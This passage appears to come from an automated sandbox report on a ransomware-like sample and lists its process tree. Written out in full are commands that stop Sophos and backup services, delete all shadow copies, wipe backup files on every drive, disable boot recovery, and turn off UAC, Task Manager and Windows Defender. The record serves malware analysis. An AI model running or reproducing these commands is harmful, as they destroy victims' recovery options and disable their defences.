  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
    3⤵
    PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo off
    3⤵
    PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c chcp 437
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Windows\system32\chcp.com
      chcp 437
      4⤵
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
    3⤵
    PID:1072
  - - C:\Windows\system32\net.exe
      net stop "Acronis VSS Provider"
      4⤵
      PID:536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Acronis VSS Provider"
        5⤵
        
        PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    PID:2156
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
      4⤵
      PID:2024
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
    3⤵
    PID:2816
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
      4⤵
      PID:2596
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    PID:2844
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      4⤵
      PID:376
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    PID:2812
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
      4⤵
      PID:2880
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    PID:1076
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
      4⤵
      PID:1700
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    PID:2716
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
      4⤵
      PID:1796
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    PID:3024
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
      4⤵
      PID:804
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    PID:3020
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
      4⤵
      PID:2040
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    PID:2728
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
      4⤵
      PID:1760
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    PID:2904
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
      4⤵
      PID:2008
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    PID:2712
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
      4⤵
      PID:2984
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    PID:2632
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
      4⤵
      PID:776
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    PID:1704
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
      4⤵
      PID:2964
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    PID:2840
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
      4⤵
      PID:556
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    PID:2804
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
      4⤵
      PID:2952
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    PID:2620
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
      4⤵
      PID:2036
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    PID:2640
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
      4⤵
      PID:1636
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    PID:1816
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
      4⤵
      PID:976
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    PID:1664
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
      4⤵
      PID:2052
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    PID:2672
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
      4⤵
      PID:1812
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    PID:2056
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
      4⤵
      PID:1856
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    PID:1208
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
      4⤵
      PID:2876
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    PID:484
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
      4⤵
      PID:1736
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    PID:852
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      PID:2088
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
        5⤵
        Interacts with shadow copies
        
        PID:324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    PID:1480
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
      4⤵
      PID:2424
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    PID:2068
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
      4⤵
      PID:2412
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    PID:2872
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
      4⤵
      PID:2648
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
    3⤵
    PID:1340
  - - C:\Windows\system32\net.exe
      net stop " Enterprise Client Service"
      4⤵
      PID:2896
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop " Enterprise Client Service"
        5⤵
        
        PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
    3⤵
    PID:932
  - - C:\Windows\system32\net.exe
      net stop "Sophos Agent"
      4⤵
      PID:1624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Agent"
        5⤵
        
        PID:2080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
    3⤵
    PID:1972
  - - C:\Windows\system32\net.exe
      net stop "Sophos AutoUpdate Service"
      4⤵
      PID:848
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
        5⤵
        
        PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
    3⤵
    PID:1720
  - - C:\Windows\system32\net.exe
      net stop "Sophos Clean Service"
      4⤵
      PID:1788
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Clean Service"
        5⤵
        
        PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
    3⤵
    PID:3124
  - - C:\Windows\system32\net.exe
      net stop "Sophos Device Control Service"
      4⤵
      PID:3132
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Device Control Service"
        5⤵
        
        PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
    3⤵
    PID:3156
  - - C:\Windows\system32\net.exe
      net stop "Sophos File Scanner Service"
      4⤵
      PID:3172
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos File Scanner Service"
        5⤵
        
        PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
    3⤵
    PID:3212
  - - C:\Windows\system32\net.exe
      net stop "Sophos Health Service"
      4⤵
      PID:3256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Health Service"
        5⤵
        
        PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
    3⤵
    PID:3296
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Agent"
      4⤵
      PID:3328
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Agent"
        5⤵
        
        PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
    3⤵
    PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
    3⤵
    PID:3412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
    3⤵
    PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
    3⤵
    PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
    3⤵
    PID:3448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
    3⤵
    PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
    3⤵
    PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
    3⤵
    PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
    3⤵
    PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
    3⤵
    PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
    3⤵
    PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
    3⤵
    PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
    3⤵
    PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
    3⤵
    PID:3576
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Client"
      4⤵
      PID:3584
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Client"
        5⤵
        
        PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
    3⤵
    PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
    3⤵
    PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
    3⤵
    PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:3692
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
      4⤵
      PID:3700
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
    3⤵
    PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
    3⤵
    PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
    3⤵
    PID:3748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
    3⤵
    PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
    3⤵
    PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
    3⤵
    PID:3780
  - - C:\Windows\system32\net.exe
      net stop "Sophos Message Router"
      4⤵
      PID:3836
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Message Router"
        5⤵
        
        PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    PID:3792
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      PID:3804
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
    3⤵
    PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:3860
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:3872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
    3⤵
    PID:3880
  - - C:\Windows\system32\net.exe
      net stop "Sophos Safestore Service"
      4⤵
      PID:3888
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Safestore Service"
        5⤵
        
        PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:3904
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
    3⤵
    PID:3920
  - - C:\Windows\system32\net.exe
      net stop "Sophos System Protection Service"
      4⤵
      PID:3928
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos System Protection Service"
        5⤵
        
        PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:3936
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
    3⤵
    PID:3960
  - - C:\Windows\system32\net.exe
      net stop "Sophos Web Control Service"
      4⤵
      PID:3976
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Web Control Service"
        5⤵
        
        PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3968
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:4000
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
      4⤵
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
    3⤵
    PID:4008
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Backup Service"
      4⤵
      PID:4024
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Backup Service"
        5⤵
        
        PID:4032
- - C:\Windows\system32\cmd.exe
